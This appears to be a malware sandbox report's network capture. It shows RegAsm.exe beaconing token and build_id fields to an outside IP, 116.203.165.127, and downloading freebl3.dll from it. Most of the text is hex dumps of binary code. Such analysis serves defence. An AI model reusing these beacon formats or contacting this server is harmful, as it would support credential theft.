                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                                        Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                                        Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        16192.168.2.949757116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:00 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 829
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:00 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------GHDBAFIIECBFHIEBKJJKCont
                                                                                                                                                                                                                                        2024-09-21 12:49:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        17192.168.2.949758116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:01 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 437
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:01 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------KJJJKFIIIJJJECAAEHDBCont
                                                                                                                                                                                                                                        2024-09-21 12:49:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        18192.168.2.949760116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:02 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 437
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:02 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CBFBGCGIJKJJKFIDBFCGCont
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        19192.168.2.949761116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC199OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:03 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:03 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                                                                                        Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                                        2024-09-21 12:49:03 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                                                                                        Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                                                                                        Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                                                                                        Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                                                                                        Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                                                                                        Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                                                                                        Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
